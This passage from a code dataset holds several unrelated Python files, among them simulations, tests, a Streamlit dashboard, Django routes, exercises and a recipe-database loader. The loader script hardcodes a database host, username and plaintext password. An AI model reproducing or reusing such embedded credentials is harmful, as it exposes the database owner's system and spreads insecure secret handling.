torch.Tensor([lossF.item(), lossKLD.item(), lossF.item() + lossKLD.item()])]\n\n\tdef set_weight_epoch(self, f):\n\t\tself.weight_epoch = f\n\t\treturn\n\n##############################################################################################################","repo_name":"MarcSerraPeralta/rec-NN","sub_path":"main/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":13487,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"34008928538","text":"from OneCompartment.oral_dose_sims import one_comp_single_dose_simulation, one_comp_multi_dose_simulation, one_comp_multi_dose_sim_delay\n\nfrom simulation_plot import plot_single_dose_output, plot_multi_dose_output, plot_multi_dose_delay_output\n\nnum_days = 10\nnum_dose = 3\n\ninterval = 24\n# delay = np.zeros(num_dose - 1)\n\ndelay = [5, 0]\n\ndose_1 = 100\ndose_2 = [100, 0, 100]\n\nt0, C0 = one_comp_single_dose_simulation(num_days, [dose_1]*num_dose)\nplot_single_dose_output(t0, C0, (10,6), 'concentration', 'ng/mL', show_auc = True, show_max = True, tS=10, tC='inf')\n\nt1, C1 = one_comp_multi_dose_simulation(num_days, num_dose, interval, [dose_1]*num_dose)\nplot_multi_dose_output(t1, C1, num_dose, interval, (10,6), 'concentration', 'ng/mL', show_auc = True, show_max = True, tS=10, tC='inf')\n\nt2, C2 = one_comp_multi_dose_sim_delay(num_days, num_dose, interval, [dose_1]*num_dose, delay)\nplot_multi_dose_delay_output(t2, C2, num_dose, interval, delay, (10,6), 'concentration', 'ng/mL', show_auc = True, show_max = True, tS=10, tC='inf')\n\nt2, C2 = one_comp_multi_dose_simulation(num_days, num_dose, interval, dose_2)\nplot_multi_dose_output(t2, C2, num_dose, interval, (10,6), 'concentration', 'ng/mL', show_auc = True, show_max = True, tS=10, tC='inf')\n","repo_name":"kamaldeen91/qsp-modeling-with-python","sub_path":"OneCompartment/execute_one_comp_model.py","file_name":"execute_one_comp_model.py","file_ext":"py","file_size_in_byte":1247,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"} +{"seq_id":"25594024711","text":"import random\nfrom unittest import TestCase\nfrom unittest.mock import patch\n\nimport matplotlib.pyplot as plt\nimport networkx as nx\n\nfrom elbridge.evolution.chromosome import Chromosome\nfrom elbridge.evolution.objectives import PopulationEquality\nfrom elbridge.evolution.search import find_best_neighbor, optimize\n\n\nclass SearchTest(TestCase):\n def setUp(self):\n self.master_graph = nx.Graph()\n nx.add_path(self.master_graph, [0, 1, 2])\n nx.add_path(self.master_graph, [5, 6, 7])\n nx.add_path(self.master_graph, [2, 3, 4, 5])\n 
self.master_graph.graph['order'] = {i: i for i in range(8)}\n self.master_graph.graph['districts'] = 2\n nx.set_node_attributes(self.master_graph, {i: 1 for i in self.master_graph}, name='pop')\n self.master_graph = nx.freeze(self.master_graph)\n\n Chromosome.objectives = [PopulationEquality(self.master_graph)]\n\n self.m_tqdm_patch = patch('elbridge.evolution.search.tqdm')\n self.m_tqdm = self.m_tqdm_patch.start()\n self.m_tqdm.side_effect = lambda x, *y, **z: x\n\n def tearDown(self):\n self.m_tqdm_patch.stop()\n\n def test_find_best_neighbor_simple(self):\n master_graph = nx.path_graph(6)\n nx.set_node_attributes(master_graph, {i: 1 for i in master_graph}, name='pop')\n master_graph = nx.freeze(master_graph)\n Chromosome.objectives = [PopulationEquality(master_graph)]\n\n s1 = Chromosome(master_graph, [1, 1, 2, 2, 2, 2])\n s2 = find_best_neighbor(s1)\n\n self.assertEqual(s2.get_scores(), [0.0])\n self.assertEqual(s2.get_assignment(), [1, 1, 1, 2, 2, 2])\n\n s3 = find_best_neighbor(s2)\n self.assertIsNone(s3)\n\n def test_optimize_simple(self):\n master_graph = nx.path_graph(6)\n nx.set_node_attributes(master_graph, {i: 1 for i in master_graph}, name='pop')\n Chromosome.objectives = [PopulationEquality(master_graph)]\n\n chromosome = Chromosome(master_graph, [1, 2, 2, 2, 2, 2])\n best_state = optimize(chromosome)\n\n self.assertEqual(best_state.get_scores(), [0.0])\n self.assertEqual(best_state.get_assignment(), [1, 1, 1, 2, 2, 2])\n\n better_state = optimize(best_state)\n best_state.normalize()\n better_state.normalize()\n self.assertEqual(best_state, better_state)\n\n\nclass SearchLoadTest(TestCase):\n def tearDown(self):\n plt.close('all')\n\n def test_find_best_neighbor_complex(self):\n size = 1000\n\n master_graph = nx.path_graph(size)\n nx.set_node_attributes(master_graph, {i: 1 for i in range(2)}, name='pop')\n nx.set_node_attributes(master_graph, {i: 2 for i in range(2, size)}, name='pop')\n master_graph.graph['districts'] = 2\n\n Chromosome.objectives = [PopulationEquality(master_graph)]\n chromosome = Chromosome(master_graph, list(range(size)))\n\n new_chromosome = find_best_neighbor(chromosome, sample_size=size * 2)\n\n self.assertEqual(new_chromosome.get_scores(), [0])\n self.assertEqual(new_chromosome.get_assignment(), [1, 1] + list(range(2, size)))\n\n def test_optimize_moderately_complex(self):\n grid_size = [32, 32]\n node_count = grid_size[0] * grid_size[1]\n edge_count = (grid_size[0] - 1) * grid_size[1] + grid_size[0] * (grid_size[1] - 1)\n\n districts = 2\n assignment = random.choices(range(1, districts + 1), k=node_count)\n\n master_graph = nx.grid_graph(grid_size)\n nx.set_node_attributes(master_graph, {i: 1 for i in master_graph}, name='pop')\n master_graph.graph['districts'] = districts\n\n Chromosome.objectives = [PopulationEquality(master_graph)]\n chromosome = Chromosome(master_graph, assignment)\n\n best_state = optimize(chromosome, sample_size=edge_count * 2)\n self.assertTrue(best_state.dominates(chromosome))\n","repo_name":"rohan/elbridge","sub_path":"tests/genetics/test_search.py","file_name":"test_search.py","file_ext":"py","file_size_in_byte":3859,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"31070100846","text":"import streamlit as st\nimport sqlalchemy\nimport pymysql\nimport datetime\nimport math\n\nfrom sqlalchemy import and_, or_\nfrom datetime import timedelta\n\n\n\nclass Singleton(type):\n\n\t# Referência: 
https://stackoverflow.com/questions/6760685/creating-a-singleton-in-python\n\t\n\t_instances = {}\n\n\tdef __call__(cls, *args, **kwargs):\n\n\t\tif cls not in cls._instances:\n\t\t\tcls._instances[cls] = super(Singleton, cls).__call__(*args, **kwargs)\n\t\treturn cls._instances[cls]\n\n\n\n\nclass database(metaclass=Singleton):\n\n\t# Páginas importantes acessadas durante o desenvolvimento desta função.\n\t# \n\t# Exemplos SQLAlchemy — Python Tutorial\n\t# https://towardsdatascience.com/sqlalchemy-python-tutorial-79a577141a91\n\t# \n\t# Working with Engines and Connections [Acesso em 18 de julho de 2022]\n\t# https://docs.sqlalchemy.org/en/13/core/connections.html\n\t#\n\t# Using Connection Pools with Multiprocessing or os.fork() [Acesso em 18 de julho de 2022]\n\t# https://docs.sqlalchemy.org/en/13/core/pooling.html#pooling-multiprocessing\n\n\n\t__engine = None\n\n\t# Initializing \n\tdef __init__( self ):\n\n\t\tdialectdriver = 'mysql+pymysql'\n\n\t\tuser = st.secrets[\"user\"]\n\t\tpasswd = st.secrets[\"passwd\"]\n\t\thost = st.secrets[\"host\"]\n\t\tport = st.secrets[\"port\"]\n\t\tdatabase = st.secrets[\"db\"]\n\n\t\tconnectionString = '{dialectdriver}://{user}:{passwd}@{host}:{port}/{db}'.format( dialectdriver=dialectdriver, user=user, passwd=passwd, host=host, port=port, db=database )\n\n\t\tself.__engine = sqlalchemy.create_engine( connectionString )\n\n\n\tdef getEngine(self):\n\t\treturn self.__engine\n\n\n\n\n\ndef consultaTotalCEPsDistintosJaProcessadosNasUltimasHoras( ultimasHoras ):\n\n\t# Páginas importantes acessadas durante o desenvolvimento desta função.\n\t# Acesso em 27 de julho de 2022\n\t# \n\t# Group by and count function in SQLAlchemy\n\t# https://www.geeksforgeeks.org/group-by-and-count-function-in-sqlalchemy/\n\t#\n\t# Query.scalar()\n\t# https://docs.sqlalchemy.org/en/14/orm/query.html#sqlalchemy.orm.query.Query.scalar\n\t#\n\t# SQLAlchemy: print the actual query\n\t# https://stackoverflow.com/questions/5631078/sqlalchemy-print-the-actual-query\n\t#\n\t# Conjunctions\n\t# https://docs.sqlalchemy.org/en/14/core/tutorial.html#conjunctions\n\n\tmyDatabase = database()\n\tengine = myDatabase.getEngine()\n\n\twith engine.connect() as connection:\n\t\tmetadata = sqlalchemy.MetaData()\n\t\ttbCeps = sqlalchemy.Table('CEPs', metadata, autoload=True, autoload_with=engine)\n\n\t\tdt_now = datetime.datetime.now(datetime.timezone.utc)\n\t\td = dt_now - timedelta(hours=ultimasHoras)\n\n\t\tquery = sqlalchemy.select([sqlalchemy.func.count(sqlalchemy.func.distinct(tbCeps.columns.co_cep))])\\\n\t\t .where( and_( tbCeps.columns.statusProcessamento == 2, tbCeps.columns.fimRaspagem >= d ) )\n\t\t\n\t\tcount = connection.execute(query).scalar()\n\n\treturn count\n\n\n\n\ndef consultaTotalCEPsDistintos():\n\n\tmyDatabase = database()\n\tengine = myDatabase.getEngine()\n\n\twith engine.connect() as connection:\n\t\tmetadata = sqlalchemy.MetaData()\n\t\ttbCeps = sqlalchemy.Table('CEPs', metadata, autoload=True, autoload_with=engine)\n\n\t\tquery = sqlalchemy.select([sqlalchemy.func.count(sqlalchemy.func.distinct(tbCeps.columns.co_cep))])\n\t\tcount = connection.execute(query).scalar()\n\n\treturn count\n\n\n\n\ndef consultaTotalPlanosColetados():\n\n\tmyDatabase = database()\n\tengine = myDatabase.getEngine()\n\n\twith engine.connect() as connection:\n\t\tmetadata = sqlalchemy.MetaData()\n\t\ttbPlanos = sqlalchemy.Table('Planos', metadata, autoload=True, autoload_with=engine)\n\n\t\tquery = sqlalchemy.select([sqlalchemy.func.count(tbPlanos.columns.idPlano)])\n\t\tcount = 
connection.execute(query).scalar()\n\n\treturn count\n\n\n\n\n\n\nif __name__ == \"__main__\":\n\n\t# Páginas importantes acessadas durante o desenvolvimento desta função.\n\t# Acesso em 27 de julho de 2022\n\t# \n\t# Deploying a web app using MySQL server via Streamlit\n\t# https://medium.com/@itssaad.muhammad/deploying-a-web-app-using-mysql-server-via-streamlit-ca28ecd02bb0\n\t#\n\t# Python String Format Cookbook\n\t# https://mkaz.blog/code/python-string-format-cookbook/\n\n\tultima1h = consultaTotalCEPsDistintosJaProcessadosNasUltimasHoras(1)\n\tultima2h = consultaTotalCEPsDistintosJaProcessadosNasUltimasHoras(2)\n\tultima24h = consultaTotalCEPsDistintosJaProcessadosNasUltimasHoras(24)\n\tultima48h = consultaTotalCEPsDistintosJaProcessadosNasUltimasHoras(24 * 2)\n\tultima1s = consultaTotalCEPsDistintosJaProcessadosNasUltimasHoras(24 * 7)\n\tultima2s = consultaTotalCEPsDistintosJaProcessadosNasUltimasHoras(24 * 7 * 2)\n\tultimo365d = consultaTotalCEPsDistintosJaProcessadosNasUltimasHoras(24 * 365)\n\n\ttotalPlanosColetados = consultaTotalPlanosColetados()\n\ttotalCEPsDistintos = consultaTotalCEPsDistintos()\n\n\n\t#\n\t# Cálculo do percentual comparativo\n\t#\n\n\ttotalHora1 = ultima1h\n\ttotalHora2 = ultima2h - ultima1h\n\n\tif totalHora1 > totalHora2:\n\t\tdeltaUltima1h = (totalHora1 / totalHora2 - 1) * 100 if 0 != totalHora2 else math.inf\n\telse:\n\t\tdeltaUltima1h = (1 - totalHora1 / totalHora2) * 100 * -1 if 0 != totalHora2 else 0\n\n\tdeltaUltima1hStr = \"{:.2f} %\".format(round( deltaUltima1h, 2)) \n\n\n\n\ttotalHora1a24 = ultima24h\n\ttotalHora25a48 = ultima48h - ultima24h\n\n\tif totalHora1a24 > totalHora25a48:\n\t\tdeltaUltima24h = (totalHora1a24 / totalHora25a48 - 1) * 100 if 0 != totalHora25a48 else math.inf\n\telse:\n\t\tdeltaUltima24h = (1 - totalHora1a24 / totalHora25a48) * 100 * -1 if 0 != totalHora25a48 else 0\n\n\tdeltaUltima24hStr = \"{:.2f} %\".format(round( deltaUltima24h, 2))\n\n\n\n\ttotalSemana1 = ultima1s\n\ttotalSemana2 = ultima2s - ultima1s\n\n\tif totalSemana1 > totalSemana2:\n\t\tdeltaUltima1s = (totalSemana1 / totalSemana2 - 1) * 100 if 0 != totalSemana2 else math.inf\n\telse:\n\t\tdeltaUltima1s = (1 - totalSemana1 / totalSemana2) * 100 * -1 if 0 != totalSemana2 else 0\n\t \n\tdeltaUltima1sStr = \"{:.2f} %\".format(round( deltaUltima1s, 2)) \n\n\n\t\n\tporcentagemConcluida = (ultimo365d / totalCEPsDistintos) * 100\n\ttempoEstimadoEmDias = (totalCEPsDistintos - ultimo365d) / ultima24h\n\t\n\n\n\tst.title(\"Melhor Plano\")\n\tst.title(\"Status em tempo real da raspagem\")\n\tst.text(\"\")\n\n\tst.subheader(\"CEPs processados\") \n\tst.text(\"\")\n\t\n\tl1col1, l1col2, l1col3 = st.columns(3)\n\tl1col1.metric(label = \"Última hora\" , value = str(ultima1h) , delta = deltaUltima1hStr )\n\tl1col2.metric(label = \"Últimas 24 horas\" , value = str(ultima24h), delta = deltaUltima24hStr)\n\tl1col3.metric(label = \"Últimos 7 dias\" , value = str(ultima1s) , delta = deltaUltima1sStr )\n\n\tst.text(\"\")\n\tst.subheader(\"Outras métricas\") \n\tst.text(\"\")\n\t\n\tl2col1, l2col2, l2col3 = st.columns(3)\n\tl2col1.metric(label = \"Planos coletados\" , value = str(totalPlanosColetados) )\n\tl2col2.metric(label = \"Total de CEPs\" , value = str(totalCEPsDistintos) )\n\tl2col3.metric(label = \"CEPs processados\" , value = str(ultimo365d) )\n\t\n\n\tst.text(\"\")\n\tst.text(\"\")\n\tst.subheader(\"{:.2f}% dos CEPS já foram processados.\".format(porcentagemConcluida))\n\n\tmy_bar = st.progress(0)\n\tmy_bar.progress( int( porcentagemConcluida ) 
)\n\t\n\tst.text(\"\")\n\tst.text(\"\")\n\tst.subheader(\"Tempo estimado para conclusão: {:.1f} dias\".format( round(tempoEstimadoEmDias,1) ) )\n\tst.caption(\"Estimativa feita utilizando o total de CEPs processados nas últimas 24 horas.\")","repo_name":"eduardomiranda/streamlit-painel-raspagem","sub_path":"painel.py","file_name":"painel.py","file_ext":"py","file_size_in_byte":7120,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"14177433374","text":"\"\"\"fashta URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/3.2/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path\nfrom mainApp import views\nfrom django.conf import settings\nfrom django.conf.urls.static import static\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path(\"\",views.homePage,name=\"home\"),\n path(\"shop////\",views.shopPage,name=\"shop\"),\n path(\"shopDetails//\",views.shopDetailsPage,name=\"shopDetails\"),\n path(\"shoppingCart/\",views.shoppingCartPage,name=\"shoppingCart\"),\n path(\"checkOut/\",views.checkOutPage,name=\"checkOut\"),\n path(\"about/\",views.aboutPage,name=\"about_us\"),\n path(\"contact/\",views.contactPage,name=\"contact\"),\n path(\"login/\",views.loginPage,name=\"login\"),\n path(\"signup/\",views.signupPage,name=\"signup\"),\n path(\"logout/\",views.logoutView,name=\"logout\"),\n path(\"profile/\",views.profilePage,name=\"profile\"),\n path(\"update-profile/\",views.updateprofilePage,name=\"updateprofile\"),\n path(\"wishlist//\",views.mywishlist),\n path(\"delete-wishlist//\",views.deletewishlist)\n]+static(settings.MEDIA_URL,document_root=settings.MEDIA_ROOT)","repo_name":"psychovaibh/Django_Projects","sub_path":"fashta/fashta/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1725,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"1880977939","text":"import os\nfrom .class_app_file_io import *\n\n\nclass BuiltInFeature:\n def __init__(self, name):\n self.name = name\n self.infFile = None\n self.evtFile = None\n self.stcFile = None\n self.oboFile = None\n self.overviewImage = None\n\n def get_path_file_name(self, file_path):\n _path, _base_name = os.path.split(file_path)\n return _path, _base_name\n\n def get_inf_file_content(self):\n if self.infFile is not None:\n _io = ApplicationInfFileIO(*self.get_path_file_name(self.infFile))\n _io.read()\n return _io\n\n def get_evt_file_content(self):\n if self.evtFile is not None:\n _io = ApplicationEvtFileIO(*self.get_path_file_name(self.evtFile))\n _io.read()\n return _io\n\n def get_stc_file_content(self):\n if self.stcFile is not None:\n _io = ApplicationStcFileIO(*self.get_path_file_name(self.stcFile))\n _io.read()\n return _io\n\n def get_obo_file_content(self):\n if self.oboFile is not None:\n _io = ApplicationOboFileIO(*self.get_path_file_name(self.oboFile))\n _io.read()\n return 
_io\n","repo_name":"yiyunzhi/pxcmbt","sub_path":"application/class_builtin_features.py","file_name":"class_builtin_features.py","file_ext":"py","file_size_in_byte":1196,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10572058586","text":"\"\"\"\r\n1.ALIŞTIRMA\r\n1'den 1000'e kadar olan sayılardan mükemmel sayı olanları ekrana yazdırın. Bunun için bir sayının mükemmel olup olmadığını dönen bir tane fonksiyon yazın.\r\n\r\nBir sayının bölenlerinin toplamı kendine eşitse bu sayı mükemmel bir sayıdır. Örnek olarak 6 mükemmel bir sayıdır (1 + 2 + 3 = 6).\r\n\"\"\"\r\n\"\"\"\r\ndef mukemmel(sayi):\r\n\r\n toplam = 0\r\n\r\n for i in range(1,sayi):\r\n if(sayi % i == 0):\r\n toplam += i\r\n\r\n return toplam == sayi\r\n\r\nfor i in range(1,1001):\r\n if (mukemmel(i)):\r\n print(\"Mükemmel Sayılar:\",i)\r\n\"\"\"\r\n\r\n\"\"\"\r\n2.ALIŞTIRMA\r\nKullanıcıdan 2 tane sayı alarak bu sayıların en büyük ortak bölenini (EBOB) dönen bir tane fonksiyon yazın.\r\n\"\"\"\r\n\"\"\"\r\ndef ebob_bulma(sayi1,sayi2):\r\n \r\n i = 1\r\n ebob = 1\r\n \r\n while (i<=sayi1 and i<=sayi2):\r\n \r\n if (not (sayi1 % i) and not (sayi2 % i)):\r\n ebob = i\r\n i += 1\r\n return ebob\r\n\r\nsayi1 = int(input(\"1.Sayıyı Girin:\"))\r\nsayi2 = int(input(\"2.Sayıyı Girin:\"))\r\n\r\nprint(\"EBOB:\",ebob_bulma(sayi1,sayi2))\r\n\"\"\"\r\n\r\n\"\"\"\r\n3.ALIŞTIRMA\r\nKullanıcıdan 2 tane sayı alarak bu sayıların en küçük ortak katlarını (EKOK) dönen bir tane fonksiyon yazın.\r\n\"\"\"\r\n\"\"\"\r\ndef ekok_bulma(sayi1,sayi2):\r\n\r\n i = 2\r\n ekok = 1\r\n\r\n while True:\r\n\r\n if (sayi1 % i == 0 and sayi2 % i == 0):\r\n ekok *= i\r\n\r\n sayi1 //= i\r\n sayi2 //= i\r\n\r\n elif (sayi1 % i == 0 and sayi2 % i != 0):\r\n ekok *= i\r\n\r\n sayi1 //= i\r\n\r\n elif (sayi1 % i != 0 and sayi2 % i == 0):\r\n ekok *= i\r\n\r\n sayi2 //= i\r\n else:\r\n i += 1\r\n\r\n if (sayi1 == 1 and sayi2 == 1):\r\n break\r\n return ekok\r\n\r\nsayi1 = int(input(\"Sayı 1:\"))\r\nsayi2 = int(input(\"Sayı 2:\"))\r\n\r\nprint (\"EKOK:\",ekok_bulma(sayi1,sayi2))\r\n\"\"\"\r\n\r\n\"\"\"\r\n4.ALIŞTIRMA\r\nKullanıcıdan 2 basamaklı bir sayı alın ve bu sayının okunuşunu bulan bir fonksiyon yazın.\"\r\nÖrnek: 97 ---------> Doksan Yedi\r\n\"\"\"\r\n\"\"\"\r\nbirler = [\"\",\"bir\",\"iki\",\"üç\",\"dört\",\"beş\",\"altı\",\"yedi\",\"sekiz\",\"dokuz\"]\r\nonlar = [\"\",\"On\",\"Yirmi\",\"Otuz\",\"Kırk\",\"Elli\",\"Altmış\",\"Yetmiş\",\"Seksen\",\"Doksan\"]\r\n\r\ndef okunus(sayi):\r\n\r\n birinci = sayi % 10\r\n ikinci = sayi // 10\r\n\r\n return onlar[ikinci] + \" \" + birler[birinci]\r\n\r\nsayi = int(input(\"Bir Sayı Girin:\"))\r\n\r\nprint(okunus(sayi))\r\n\"\"\"\r\n\r\n\"\"\"\r\n5.ALIŞTIRMA\r\n1'den 100'e kadar olan sayılardan pisagor üçgeni oluşturanları ekrana yazdıran bir fonksiyon yazın.(a <= 100,b <= 100)\r\n\"\"\"\r\n\"\"\"\r\ndef pisagor_bulma():\r\n\r\n pisagor = list()\r\n\r\n for i in range(1,101):\r\n for j in range(1,101):\r\n\r\n c = (i ** 2 + j ** 2) ** 0.5\r\n\r\n if (c == int(c)):\r\n pisagor.append((i,j,int(c)))\r\n\r\n return pisagor\r\n\r\nfor i in pisagor_bulma():\r\n print(i)\r\n\"\"\"\r\n\r\nL = [4, 12, 2, 43, 15, 36]\r\nL[2:4]\r\n","repo_name":"huzeyfebostan/Calismalarim","sub_path":"Python/Kodlama_Egzersizleri/Fonksiyonlar/Odevler.py","file_name":"Odevler.py","file_ext":"py","file_size_in_byte":2911,"program_lang":"python","lang":"tr","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"19518896439","text":"from flask import request\r\nfrom datetime 
import datetime\r\n\r\nimport random\r\n\r\nbattery = {\r\n\r\n}\r\n\r\nresponse = \"hello\"\r\n\r\ndef search() -> list:\r\n return battery\r\n\r\ndef addnew():\r\n hash = random.getrandbits(64)\r\n print (request.headers)\r\n batt = { hash : {\r\n \"batlife\": request.json['batlife'],\r\n \"charging\": request.json['charging'],\r\n \"time\": datetime.now(),\r\n \"timeleft\": request.json['timeleft']\r\n }\r\n }\r\n battery.update(batt)\r\n return batt\r\n","repo_name":"JMathiszig-Lee/inductionbingo","sub_path":"api/battery.py","file_name":"battery.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"31220305068","text":"def response(hey_bob=\"\"):\n \"\"\"\n Bob is a lackadaisical teenager. In conversation, his responses are very limited.\n\n Bob answers 'Sure.' if you ask him a question, such as \"How are you?\".\n\n He answers 'Whoa, chill out!' if you YELL AT HIM (in all capitals).\n\n He answers 'Calm down, I know what I'm doing!' if you yell a question at him.\n\n He says 'Fine. Be that way!' if you address him without actually saying anything.\n\n He answers 'Whatever.' to anything else.\n \"\"\"\n message = hey_bob.strip()\n if not message:\n return \"Fine. Be that way!\"\n elif message.endswith(\"?\") and message.isupper():\n return \"Calm down, I know what I'm doing!\"\n elif message.endswith(\"?\"):\n return \"Sure.\"\n elif message.isupper():\n return \"Whoa, chill out!\"\n else:\n return \"Whatever.\"\n","repo_name":"miwojc/exercism","sub_path":"python/bob/bob.py","file_name":"bob.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70492922347","text":"from pkg_resources import load_entry_point\n\nfrom ..base_options import OptionsHolder\nfrom ..types import FieldValueError, dependency_string, wrap_field_error\n\n\ndef _get_usage_type(type, field='type'):\n try:\n return load_entry_point('mopack', 'mopack.usage', type)\n except ImportError:\n raise FieldValueError('unknown usage {!r}'.format(type), field)\n\n\ndef preferred_path_base(preferred, path_bases):\n if preferred in path_bases:\n return preferred\n elif len(path_bases) > 0:\n return path_bases[0]\n else:\n return None\n\n\nclass Usage(OptionsHolder):\n _default_genus = 'usage'\n _type_field = 'type'\n _get_type = _get_usage_type\n\n def __init__(self, pkg, *, inherit_defaults=False):\n super().__init__(pkg._options)\n\n def version(self, metadata, pkg):\n raise NotImplementedError('Usage.version not implemented')\n\n def _usage(self, pkg, submodules, **kwargs):\n return {'name': dependency_string(pkg.name, submodules),\n 'type': self.type, **kwargs}\n\n def get_usage(self, metadata, pkg, submodules):\n raise NotImplementedError('Usage.get_usage not implemented')\n\n def __repr__(self):\n return '<{}, {}>'.format(type(self).__name__, self.__dict__)\n\n\ndef make_usage(pkg, config, *, field='usage', **kwargs):\n if config is None:\n raise TypeError('usage not specified')\n\n if isinstance(config, str):\n type_field = ()\n type = config\n config = {}\n else:\n type_field = 'type'\n config = config.copy()\n type = config.pop('type')\n\n if not config:\n config = {'inherit_defaults': True}\n\n with wrap_field_error(field, type):\n return _get_usage_type(type, type_field)(pkg, **config, 
**kwargs)\n","repo_name":"ungtb10d/mopack","sub_path":"mopack/usage/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39005743418","text":"class Solution:\n def longestPalindrome(self, s: str) -> int:\n alphaCountTable = [0]*58\n for c in s:\n alphaCountTable[ord(c)-ord('a')] += 1\n res = 0\n haveOdd = False\n for cnt in alphaCountTable:\n if cnt %2 == 1:\n haveOdd = True\n res += cnt-1\n else:\n res += cnt\n return res+1 if haveOdd else res\n\nif __name__ == '__main__':\n sol = Solution()\n s = \"abccccdd\"\n print(sol.longestPalindrome(s))","repo_name":"LiaoU3/LeetCode","sub_path":"Problems/409_Longest_Palindrome.py","file_name":"409_Longest_Palindrome.py","file_ext":"py","file_size_in_byte":520,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"34152383392","text":"import psycopg2\nimport csv\nimport ast\nimport random\n\nconn = psycopg2.connect(\n host=\"reddwarf.cs.rit.edu\",\n database=\"p320_02a\",\n user=\"p320_02a\",\n password=\"mdzpxSyGJSvn\",\n)\n\ncur = conn.cursor()\n\ncur.execute(\"select * from public.users\")\n\n# filename = \"/Users/xinruzou/Downloads/archive/new_pp_recipe.csv\"\n# filename2 = \"/Users/xinruzou/Downloads/archive/new_recipe_raw.csv\"\n\n\nfilename = \"new_pp_recipe.csv\"\nfilename2 = \"new_recipe_raw.csv\"\n\nwith open(filename, 'r', encoding=\"utf8\") as csvfile:\n with open(filename2, 'r', encoding=\"utf8\") as csvfile2:\n print(\"1\")\n\n csvreader = csv.reader(csvfile)\n csvreader2 = csv.reader(csvfile2)\n\n next(csvreader)\n next(csvreader2)\n for rows in csvreader:\n\n recipe_id = rows[0]\n # print(recipe_id)\n ingredients = ast.literal_eval(rows[7])\n\n # check if the recipe exist in the recipe table.\n cur.execute(\"SELECT * FROM public.recipe WHERE recipe_id = %s\", (recipe_id,))\n exist = cur.fetchall()\n if not exist:\n continue\n else:\n for position in range(len(ingredients)):\n\n cur.execute(\"SELECT * FROM public.ingredients WHERE id = %s\"\n , (ingredients[position],))\n\n ingredients_exist = cur.fetchall()\n # this ingredient does not exist in ingredient table\n if not ingredients_exist:\n # loop over the rows in the second file\n for rows2 in csvreader2:\n if rows2[1] == recipe_id:\n int1 = ast.literal_eval(rows2[10])\n ingredient_name = int1[position]\n print(ingredient_name)\n print(\"Insert Ingredient\")\n cur.execute(\"INSERT INTO public.ingredients(id, name, aisle) \"\n \"VALUES( %s, %s, %s)\", (ingredients[position], ingredient_name, \"1\"))\n conn.commit()\n break\n\n # ingredient already exist\n\n cur.execute(\"SELECT * FROM public.ingredient_to_recipe WHERE recipe_id = %s AND ingredient = %s\"\n \"\", (recipe_id, ingredients[position]))\n result = cur.fetchall()\n if not result:\n\n cur.execute(\"INSERT INTO public.ingredient_to_recipe(recipe_id, ingredient) \"\n \"VALUES( %s, %s)\", (recipe_id, ingredients[position]))\n # print(\"success\")\n conn.commit()\n else:\n a = 1\n # print(\"already exist\")\n","repo_name":"Jackxu9946/PDM_Main_Code","sub_path":"ingredient_to_recipe.py","file_name":"ingredient_to_recipe.py","file_ext":"py","file_size_in_byte":2901,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10820743870","text":"import argparse\nimport random\n\nimport numpy as np\nimport pandas as pd\nfrom sklearn.metrics import mean_absolute_error\n\nfrom utils import 
load_data, split_data, inference_model_training, recommendation\nfrom obfuscation import differential_privacy, random_obf, frapp_obf, sim_obf, PrivCheck\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--obf', type=str, default='frapp', help=\"DP, random, frapp, similarity, privcheck\")\n parser.add_argument('--beta', default=1, help=\"parameter of DP\")\n parser.add_argument('--p_rand', default=0.5, help=\"parameter of random\")\n parser.add_argument('--gamma', default=100, help=\"parameter of frapp\")\n parser.add_argument('--percentage', default=0.5, help=\"parameter of similarity\")\n parser.add_argument('--deltaX', default=0.60, help=\"parameter of privcheck\")\n parser.add_argument('--cluster_num', default=10, help=\"cluster number for privcheck\")\n parser.add_argument('--seed', type=int, default=42)\n parser.add_argument('--repeats', type=int, default=10)\n args = parser.parse_args()\n\n # random.seed(args.seed)\n\n # load and split data\n df = load_data()\n df_train, df_test, df_test_rec_items = split_data(df)\n\n # inference model training\n model_rf = inference_model_training(df_train, 'rf')\n model_xgb = inference_model_training(df_train, 'xgb')\n print(\"inference model training over.\")\n\n # obfuscation\n if args.obf == 'DP':\n X_obf_dict, X_ori = differential_privacy(df_test, args.beta, repeats=args.repeats)\n elif args.obf == 'random':\n X_obf_dict, X_ori = random_obf(df_test, p_rand=args.p_rand, repeats=args.repeats)\n elif args.obf == 'frapp':\n X_obf_dict, X_ori = frapp_obf(df_test, gamma=args.gamma, repeats=args.repeats)\n elif args.obf == 'similarity':\n 